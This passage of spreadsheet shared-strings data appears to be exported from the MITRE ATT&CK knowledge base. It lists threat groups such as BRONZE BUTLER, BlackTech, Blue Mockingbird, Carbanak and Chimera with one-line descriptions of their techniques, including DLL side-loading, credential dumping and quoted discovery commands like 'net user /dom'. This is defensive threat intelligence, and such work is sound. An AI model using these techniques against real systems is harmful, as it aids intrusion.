    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used TROJ_GETVERSION to discover system services.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--069d3677-2694-4385-b5c3-ea6e231d26d9</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net time&lt;/code&gt; to check the local time on a target system.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--6c053469-7bd4-4b55-90b2-289a09aa53fa</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has placed malware on file shares and given it the same name as legitimate documents on the share.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--bf160f02-ab07-4f2d-8625-5818833bb77f</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</si>
  <si>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</si>
  <si>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relationship--321a0d18-11a6-4504-add5-8ee515a43170</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--529360d5-172a-4326-b993-e3af75d3e7af</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) malware has used HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--58fdc63b-05b4-4db9-90fe-c80f7956292f</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used batch scripts and the command-line interface for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d57dd9d9-d075-48c4-ae54-ed0aeae575de</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has executed DLL search order hijacking.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--e4fe7d70-a0c9-4d2b-ba4a-0d6bc2e08f0e</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--5893fbd3-f3c0-4332-b2e3-e6a07142ef9d</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has also exploited mis-configured Plesk servers.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--3f4096d5-06d8-4a1e-bb31-0e2b37d5f622</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has downloaded additional files and tools onto a compromised host.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--b683c558-074d-4e29-808f-6d86948dd5d0</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has copied files of interest to the main drive's recycle bin.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--c37f69b0-176a-483d-b75c-3b0c84e03276</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--ed5bd47a-cdc4-4962-b956-dd3ae7c00024</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has disguised their backdoor droppers with naming conventions designed to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--f7fee577-ea37-4d2b-9353-8bfada984f55</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped implants in folders named for legitimate software.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--5017f2dc-e43e-438b-b63f-5f3f4603e9db</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--c92f6bab-4dfc-443d-903c-35318b80a396</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--d92f4be1-6745-45a2-bfbb-c4cb227682d2</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obfuscated tools and malware it uses with VMProtect.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--034b1ca2-8202-4eb9-9fbe-b519ed3dd5a8</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used an executable to detect removable media, such as USB flash drives.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--d758de81-c572-45dc-94ed-67a4dc1da3fe</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used NetCat and PortQry  to enumerate network connections and display the status of related TCP and UDP ports.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--cdcf94e0-b105-49c0-8f62-64f7350a5658</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--41e2d922-5014-479d-85ba-da70ad6aa44b</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used web shells to establish an initial foothold and for lateral movement within a victim's system.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--3740c99a-3d2d-4ea3-ae6e-2a3bfcf572f3</t>
  </si>
  <si>
    <t>G0063</t>
  </si>
  <si>
    <t>BlackOasis</t>
  </si>
  <si>
    <t>intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850</t>
  </si>
  <si>
    <t>[BlackOasis](https://attack.mitre.org/groups/G0063)'s first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>relationship--4ad9aa86-f489-4f0f-926f-f381221c3705</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used stolen code-signing certificates for its malicious payloads.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--06bf8477-fed1-410b-8fc9-2655758eed41</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>relationship--9d2dfa0b-8370-4873-9b8f-4366e61be715</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used valid, stolen digital certificates for some of their malware and tools.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>relationship--ff9691d7-91dd-4549-b997-d5abf327ef1f</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--51cc3f41-f5aa-4d04-95de-15d96e103bac</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--66a14eeb-a6a0-4614-8224-7f238b3a83da</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)	 </t>
  </si>
  <si>
    <t>relationship--f6d1c615-16df-4527-ad74-ce8623f87ce0</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious links to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)	 </t>
  </si>
  <si>
    <t>relationship--036d9e28-e7c4-4865-b964-2ea213274521</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used built-in API functions.(Citation: IronNet BlackTech Oct 2021)</t>
  </si>
  <si>
    <t>relationship--56f73ea6-f7ba-4226-bbf9-55e904843e31</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used the SNScan tool to find other potential targets on victim networks.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--0bc4d3d8-8018-4e0a-a365-ebef543e1222</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--8c5e20b3-b15c-4c08-84fe-eeacd9209375</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used Putty for remote access.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--55b0cb4d-1109-449c-82f6-ed42317df209</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--795b9ebc-6bf1-47f9-b236-117c2216c5d4</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with links to cloud services to deliver malware.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--01455ab2-2769-4eab-9df2-e7e5f707e7c6</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has obtained and used tools such as Putty, SNScan, and [PsExec](https://attack.mitre.org/software/S0029) for its operations.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--17738bdd-24b9-44d0-a897-d1b861fd2636</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used JuicyPotato to abuse the &lt;code&gt;SeImpersonate&lt;/code&gt; token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--6d3d48ff-ea37-4626-8148-4111163e95e3</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--0e7ce20c-1a4f-4361-a954-1d7a164baca1</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--a4bb6f26-b659-4d1d-b0fc-f4f4efe32db6</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Mimikatz to retrieve credentials from LSASS memory.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--56af2eea-6c9d-4917-b7d9-275877cb552a</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--cc42a6c0-ce7c-442b-8ccc-cb5a9fba3462</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Registry modifications to specify a DLL payload.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>relationship--8b3f4fd5-9acd-49e5-bae5-6996ae46aa0f</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obfuscated the wallet address in the payload binary.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--85aecc08-dda1-4203-9dec-376f1d9d3cad</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used PowerShell reverse TCP shells to issue interactive commands over a network connection.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--06de29d8-365b-4072-a4bb-9d436763ea1e</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used frp, ssf, and Venom to establish SOCKS proxy connections.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--4c26e6e8-8303-44ad-9e5d-452dff52858f</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>relationship--b04c89b2-f790-4961-a012-7ccd18d1436e</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--abd46534-2632-4c12-a9c2-06a2a4116f2c</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used XMRIG to mine cryptocurrency on victim systems.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--8042dc21-37e4-4a60-aef1-457179f346e5</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--66513679-0866-4091-a346-2679db5e3cca</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Explorer to manually copy malicious files to remote hosts over SMB.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--bf4d368e-202d-4bd2-9ffe-013ca6104e05</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Scheduled Tasks to establish persistence on local and remote hosts.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--3f221ccc-1be7-4959-b239-6a3e027da1ae</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>relationship--8dc7e200-3c90-4611-9bbe-aa90056f423e</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has collected hardware details for the victim's system, including CPU and memory information.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--1b9b84cc-f9c7-48c5-8e23-ac00a7a4691a</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--f06ee9db-1a29-412f-9584-5175eff85f28</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used batch script files to automate execution and deployment of payloads.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--552215a4-9761-4dce-8a59-83cd81ca43a8</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe to set environment variables.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--51548d6c-0aa9-4813-8493-3d9bbcd0617a</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--1a666dc1-d0b9-49ac-b05b-350cfca7fa61</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has made their XMRIG payloads persistent as a Windows Service.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--328e9746-4bb6-47e1-8e71-6418ca04c5fa</t>
  </si>
  <si>
    <t>G1012</t>
  </si>
  <si>
    <t>CURIUM</t>
  </si>
  <si>
    <t>intrusion-set--3ea7add5-5b8f-45d8-b1f1-905d2729d62a</t>
  </si>
  <si>
    <t>[CURIUM](https://attack.mitre.org/groups/G1012) has exfiltrated data from a compromised machine.(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--6fad7038-4d0f-48c3-937a-7128d4bf0592</t>
  </si>
  <si>
    <t>[CURIUM](https://attack.mitre.org/groups/G1012) has lured users into opening malicious files delivered via social media.(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--24021025-b5db-4ebb-89cb-49fe5c4d709e</t>
  </si>
  <si>
    <t>13 January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</si>
  <si>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</si>
  <si>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relationship--6fc8e3dd-1bb7-4e76-8a8c-9e836f944488</t>
  </si>
  <si>
    <t>[CURIUM](https://attack.mitre.org/groups/G1012) has used social media to deliver malicious files to victims.(Citation: Microsoft Iranian Threat Actor Trends November 2021)</t>
  </si>
  <si>
    <t>relationship--06a1f6f9-0695-47e6-bf1b-363d435d0bb2</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has used a VBScript named "ggldr" that uses Google Apps Script, Sheets, and Forms services for C2.(Citation: Forcepoint Carbanak Google C2)</t>
  </si>
  <si>
    <t>relationship--a732c265-07f0-4e9b-a42c-0df6277e5b27</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) may use [netsh](https://attack.mitre.org/software/S0108) to add local firewall rule exceptions.(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>relationship--1ae1ce05-3db2-4a97-8e58-0ed3d65d9d22</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has copied legitimate service names to use for malicious services.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--28a4517c-89b9-4744-a58f-6a1f1fec3c33</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has named malware "svchost.exe," which is the name of the Windows shared service host program.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--bbf116bf-6f8a-44f4-9d98-db6ccbbff333</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>relationship--af1514c0-0e58-4878-a409-9804a7ce5e0b</t>
  </si>
  <si>
    <t>27 December 2019</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--539f8bc3-3fb4-43af-8918-9a65239cdff6</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029) and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--f9b07e52-aff8-4fad-af72-ff646495d25f</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--58882b0d-0f4a-4e12-b8c1-f43c53fd96f4</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) malware installs itself as a service to provide persistence and SYSTEM privileges.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--aad8c4dc-db11-48b4-b294-f63ccde5e798</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--49fb7af8-50cf-4af5-9195-40b2351fa6dc</t>
  </si>
  <si>
    <t>27 August 2020</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used custom DLLs for continuous retrieval of data from memory.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--b61e25f5-89cd-4c64-90e6-15b8b21a3a10</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;type \\&lt;hostname&gt;\c$\Users\&lt;username&gt;\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*&lt;/code&gt; for bookmark discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--f01bad7e-e96c-43fe-8ac9-63c4863e8c76</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has cleared event logs on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--4684788a-b196-4a91-b4ad-18e93beb9ffb</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has encoded PowerShell commands.(Citation: Cycraft Chimera April 2020)	</t>
  </si>
  <si>
    <t>relationship--79633fcf-d22a-40f0-a9be-52fc0608825f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used credential stuffing against victim's remote services to obtain valid accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--bfc3568d-1304-43ce-be97-5fc4209d8a79</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected credentials for the target organization from previous breaches for use in brute force attacks.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--ddc692ea-33e8-493d-a5e3-ce0de48da15c</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used side loading to place malicious DLLs in memory.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--0390ebec-176f-421a-9823-cce48756aef1</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to encapsulate C2 in DNS traffic.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--46d350be-fcde-4c7a-ac75-d86c8f5ccd5f</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected data of interest from network shares.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--acb0fd33-201c-481f-857d-429c3ef67015</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has has used &lt;code&gt;net user /dom&lt;/code&gt; and &lt;code&gt;net user Administrator&lt;/code&gt; to enumerate domain accounts including administrator accounts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--57da83d5-2698-41b0-92b8-a92da8a4599c</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used compromised domain accounts to gain access to the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--90c8ecca-41d2-4a28-84fe-b76c1d969363</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114)'s malware has altered the NTLM authentication program on domain controllers to allow [Chimera](https://attack.mitre.org/groups/G0114) to login without a valid credential.(Citation: Cycraft Chimera April 2020)	</t>
  </si>
  <si>
    <t>relationship--42edbbf4-8779-47d8-bc9b-452073939a1a</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has &lt;code&gt;nltest /domain_trusts&lt;/code&gt; to identify domain trust relationships.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--47d7a2ff-104a-49f9-a28f-6b1a79eca559</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) C2 beacons for data exfiltration.(Citation: NCC Group Chimera January 2021) </t>
  </si>
  <si>
    <t>relationship--2ad83456-5794-44d5-bfd1-3c51b2925c01</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has exfiltrated stolen data to OneDrive accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--d17fcc24-a9ae-4841-b35b-f694b3991fba</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--bd8a36f5-1da5-49de-b292-ac0e4a58340c</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114) has performed file deletion to evade detection.(Citation: Cycraft Chimera April 2020) </t>
  </si>
  <si>
    <t>relationship--a33d759f-6106-4e67-9452-72b684ab209a</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has utilized multiple commands to identify data of interest in file and directory listings.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--577a7635-c4e3-42ab-8f16-d59330fdd535</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has remotely copied tools and malware onto targeted systems.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--f94c1c97-ec5d-4703-93c1-91de05761d2a</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has copied tools between compromised hosts using SMB.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--778297c2-55a2-4f80-8216-daa25bd148a9</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net user&lt;/code&gt; for account discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--85327654-1ce1-43f6-bc8b-eb6c1c83d483</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has staged stolen data locally on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--68953f34-79e2-482a-bc9a-dbe11c2839ae</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</si>
  <si>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</si>
  <si>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relationship--a8730dc5-9f3b-449d-8b17-f5a6638aaac4</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to identify  accounts with local administrative rights.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--95747003-2c4a-4e4a-ad9d-fde75f04f406</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--74cc85f8-594d-428b-a44a-5ede87df0ad9</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--e925337d-e878-48ad-a53c-3a3f4656849e</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</si>
  <si>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</si>
  <si>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relationship--64abef3c-d453-4782-b084-25f684b3f7ae</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used direct Windows system calls by leveraging Dumpert.(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--3cf6afbd-a010-4982-8121-22e67ace6046</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</si>
  <si>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</si>
  <si>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relationship--82c8372e-9b69-4720-a351-d6f0bda110d5</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net share&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; to identify network shares of interest.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--71cac5bb-2d68-44b8-ae8a-4d159c06ec61</t>
  </si>
